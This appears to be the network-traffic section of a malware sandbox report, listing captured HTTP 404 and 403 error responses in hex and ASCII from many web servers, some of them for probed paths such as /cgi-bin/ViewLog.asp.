Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:20:00 GMTServer: ServerX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Fri, 29 Oct 2021 18:20:08 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:20:14 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Date: Fri, 29 Oct 2021 18:20:00 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.</BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:20:17 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:21:54 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Jan 2004 11:13:11 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: David-WebBox/12.00a (1291)Transfer-Encoding: chunkedCache-Control: no-cacheConnection: closeContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:20:27 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Oct 2021 18:15:02 GMTServer: Apache/2.2.21 (Unix) PHP/5.2.17Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 193Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3b 0f 82 40 10 84 fb fb 15 2b 8d 15 ac af f2 72 85 3c 22 09 2a 05 9a 50 02 b7 91 4b 80 23 dc 89 f1 df cb a3 b1 9c d9 6f 76 86 6f 82 bb 9f e5 69 08 97 ec 9a 40 fa 38 27 b1 0f 8e 8b 18 87 59 84 18 64 c1 7a 39 78 3b c4 f0 e6 08 c6 6b db 36 82 d7 54 c8 49 58 65 1b 12 a7 dd 11 22 3d 94 4a 4a ea 38 ae 26 e3 b8 40 bc d4 f2 3b e7 f6 e2 8f 99 14 e3 bd c8 f5 1b a4 ee b6 16 ea 62 24 e8 69 68 95 31 4a 77 60 35 14 55 45 c6 00 56 2f e5 96 aa c3 a7 a2 4f a2 5f 5e 61 7a 36 13 b5 32 60 68 18 69 f0 38 f6 73 e1 52 35 3d 9f 27 b2 1f bd cc 11 ff dd 00 00 00 Data Ascii: M;@+r<"*PK#ovoi@8'Ydz9x;k6TIXe"=JJ8&@;b$ih1Jw`5UEV/O_^az62`hi8sR5='
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Oct 2021 18:20:32 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:15:28 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Fri, 29 Oct 2021 18:20:40 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 37 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Oct 2021 18:20:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 20:20:49 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 207Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:20:53 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Keil-EWEB/2.1Content-type: text/htmlConnection: closeData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 31 2e 30 20 34 30 34 20 45 72 72 6f 72 2e 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 3e 3c 62 72 3e 3c 2f 62 Data Ascii: <head><title></title></head><body><h2>HTTP 1.0 404 Error. File Not Found</h2>The requested URL was not found on this server.<hr><br></b
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: 1.2.2-1.el7.centosDate: Fri, 29 Oct 2021 18:20:53 GMTContent-Type: text/htmlContent-Length: 175Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 31 2e 32 2e 32 2d 31 2e 65 6c 37 2e 63 65 6e 74 6f 73 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>1.2.2-1.el7.centos</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.1Date: Fri, 29 Oct 2021 18:20:55 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Oct 2021 18:21:15 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
